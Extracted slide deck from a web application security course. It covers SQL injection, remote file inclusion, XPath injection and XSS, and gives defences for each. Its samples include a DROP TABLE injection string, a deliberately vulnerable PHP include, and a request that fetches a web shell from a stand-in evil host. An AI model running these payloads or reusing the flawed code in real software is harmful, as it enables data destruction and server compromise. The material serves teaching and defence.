Web Application Security

Web Application
Security
Slides by: Ynon Perek
ynon@ynonperek.com
http://ynonperek.com
Monday, April 29, 13

Agenda
n Intro to Web Security
n Web Application Architecture
n Code Injections
n Request Forgeries
n Losing Trust

Reasons for Security

Reasons for Security
n Reliable systems are secure
n Security of a system = Security of the weakest part
n Hard to ﬁx after system is ready
n Everyone should care

How It All Started
n John Draper (Cap’n
Crunch)
n phreaking in the 70s

How It All Started
n 1986 Brain
n 1988 Morris
n Both (meant as) harmless
n Lead to CERT

How It All Started
n 90s gave birth to phishing
attacks
n AOL being the ﬁrst victim

How It All Started
n Security became an issue
n 2003 Summer of worms
n Blaster, Nachi, SoBig

IT Security Today
NPR.org Hacked; 'Syrian Electronic
Army' Takes Responsibility
April 16,

IT Security Today

IT Security Today
‫מטוס‬ ‫להפיל‬ ‫כדי‬ ‫שצריך‬ ‫מה‬ ‫כל‬ ,‫פחד‬ ‫איזה‬
‫אנדרואיד‬ ‫זה‬
.‫אחת‬ ‫תגובה‬ .10:04 ,2013 ‫באפריל‬ 12 ‫רז‬ ‫זהבי‬ ‫נועה‬ ‫מאת‬
‫סלולר‬ ,‫מידע‬ ‫אבטחת‬ ‫לקטגוריות‬ ‫שייך‬
‫אבטחה‬ ‫פריצת‬ ‫ישנה‬ ‫הפיקוח‬ ‫מגדלי‬ ‫בתוכנות‬ ‫כי‬ ‫גילה‬ ‫האקר‬
.‫ההודעה‬ ‫את‬ ‫לו‬ ‫שולח‬ ‫באמת‬ ‫מי‬ ‫לדעת‬ ‫יכול‬ ‫לא‬ ‫הטייס‬ – ‫חמורה‬
‫ואף‬ ‫מטוס‬ ‫על‬ ‫להשתלט‬ ‫ניתן‬ ‫שפיתח‬ ‫אפליקצייה‬ ‫באמצעות‬
‫לרסקו‬

Why Is It Hard ?
n Secure code problems:
n Lack of knowledge
n Carelessness

Secure From The Start
n Fixing security errors after coding is expensive
n Writing secure code is easy

Web Applications

Web Architecture
Client Server
GET Data
Send Response

Server Side
n Creates data and sends
back to client
n Data can be: HTML,
JSON, XML, Images and
more
n Choose your ﬂavor

Server Side Flaws
n Code injections
n Information leak

Client Side
n Web browser takes data
and renders on screen
n Browsers: IE, Firefox,
Chrome, Safari
n Languages: JavaScript,
ActionScript, Java
(Applets)

Client Side Flaws
n Code injections
n Information leak

Web Weakness
n Client-Server gap is too easy
n HTTP is state-less
n Many different technologies and vendors
n Code/Data intermix
n It’s way more complicated than it looks

Code Injections
n Query Injections (SQL, XPath, LDAP)
n Remote File Inclusion
n JavaScript Injections ( XSS, CSRF )

SQL Injections
n Started in 1999
n (Probably) the most famous technique
n 83% of data breaches 2005-2011
n attack rate: 70 attempts / hour

Famous Victims
n (2002) guess.com revealed 200K customer names
and credit cards
n (2007) Microsoft UK Defacement
n (2009) RockYou DB hacked for 30Mil users
n (2011) MySql.com hacked
n (2012) Yahoo lost 450K login credentials

SQL Injections

What Did Bobby Break
$query = "SELECT name, grade " +
"FROM students " +
"WHERE name = '$user'"

What Did Bobby Break
$query = "SELECT name, grade " +
"FROM students " +
"WHERE name = 'Robert'; DROP TABLE students'"
Expected data
got code

SQLi Examples
n See if you can log in
n Login form code:
https://github.com/ynonp/web-security-demos/
blob/master/lib/WebSecurity/Demos/Controller/
SQLInjection/Login.pm

SQLi Example
n See if you can print out names and passwords
n https://github.com/ynonp/web-security-demos/
SQLInjection/InfoLeak.pm

Affected Languages
n All programming languages
n Usually found in ASP, Java, Perl and PHP

Bug Spotting
n Search for code that:
n Takes user input
n Does not validate input
n Uses input to talk to DB

Bug Spotting
n In code review
n Find DB code
n Make sure its input is sanitized

Black-Box Spotting
n Many automated tools will
help you ﬁnd SQL
Inejctions
n Popular: Havij
http://www.itsecteam.com/
products/havij-v116-
advanced-sql-injection/

How To Avoid
n Use prepared statements
n Demo:
SELECT name, grade FROM students
WHERE name=?
? are later bound
to data

How To Avoid
n Sanitize your input. Always
n Demo:
if ( ! $name =~ /^[a-z]+$/ ) {
die "Invalid Input";
}

if ( ! $age =~ /^[0-9]+$/ ) {
die "Invalid Input";
}

Extra Precautions
n Keep users passwords hashed in the DB
n Encrypt important data in DB
n Microsoft URLScan
n TrustWave ModSecurity (Open Source)

Q & A
SQL Injections

Remote File Inclusion
n Users upload files
n Some files are dangerous
n OR
n Server loads files based on user input

The Risk
<?php
if (isset( $_GET['COLOR'] ) ){
include( $_GET['COLOR'] . '.php' );
}
?>
With
/vulnerable.php?COLOR=http://
evil.example.com/webshell.txt

Local File Inclusion
n Other bugs allow attacker to upload a PHP ﬁle to
your server
n Usually missing upload ﬁle name tests

Demo: imgur

The Risk
Server
Save editor.php
upload.php
uploads/editor.php

Remote File Demo
if ($_POST['url']) {
$uploaddir = $_POST['url'];
}

$first_filename = $_FILES['uploadfile']['name'];
$filename = md5($first_filename);
$ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
$file = $uploaddir . basename($filename . '.' . $ext);

if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
echo basename($filename . '.' . $ext);
} else {
echo 'error';
}

Example: OpenBB
PHP remote file inclusion vulnerability in Open
Bulletin Board (OpenBB) 1.0.8 and earlier allows
remote attackers to execute arbitrary PHP code
via a URL in the root_path parameter to (1)
index.php and possibly (2) collector.php.
CVE-2006-4722

Bug Spotting
n Search for code that loads external files
n Search for code that stores external files
n Make sure file name is sanitized

How To Avoid
n Avoid by sanitizing your input
n Don’t allow uploads if you don’t have to

Other Injections
n XPath Injection
n LDAP Injection

Demo
n Try to ﬁnd a company’s id using:
XPathInjection/Leak.pm

Client-Side Injections
n A relatively new category of injections uses Client
Side languages (mainly JavaScript)
n Attacker uses website to attack other users

JavaScript Injections
Evil Hacker
Honest User
Web
Application
(Email)
Send message to
honest user
Message includes
evil JS code

JavaScript Security
n Browsers use a security policy called
“Same Origin Policy”
n A page has an origin
n Some actions are restricted to the page’s origin

JavaScript Risks
n Same Origin Policy protects the following:
n Unauthorized access to cookies
n Unauthorized access to canvas
n Unauthorized AJAX calls

Famous Injections
n XSS is the most famous JavaScript injection
n Variants: Inject code to ﬂash

Famous Injections

Famous Injections
Twitter, Sep 2010

Famous Injections
Yahoo, Jan 2013

Famous Injections
n “Sammy Is My Hero”
n (2005) Sammy’s worm infected a Million accounts
in less than 20 hours

Examples
n Throwing users out of a public chat room
n Getting a user to send a “fake” message
JSInjection/Chatter.pm

Examples
n Hijacking a user’s session through messaging
n Getting a user to send a fake message
XSS/SessionHijack.pm

Bug Spotting
n Search for code that writes markup to user
n Verify all output is sanitized

Bug Spotting
n http://
xsser.sourceforge.net/
n Python script that detects
XSS bugs in sites

Avoiding The Bug
n Use the framework
n Sanitize your output
n Consider other users

Q & A
Client-Side Injections

Code Weak Spots
n Injections are more likely
to occur in:
n Cookies
n HTTP Headers
n Don’t forget to sanitize
these too

Web Security
n Security of a system = the weakest part
n System breaches usually involve more than one
vulnerability
n Use the power of frameworks

Thanks For Listening
n Ynon Perek
n http://ynonperek.com
n ynon@ynonperek.com

Web Application Security

Recommended

Recommended

More Related Content

Viewers also liked

Viewers also liked (20)

Similar to Web Application Security

Similar to Web Application Security (20)

More from Ynon Perek

More from Ynon Perek (20)

Recently uploaded

Recently uploaded (20)

Web Application Security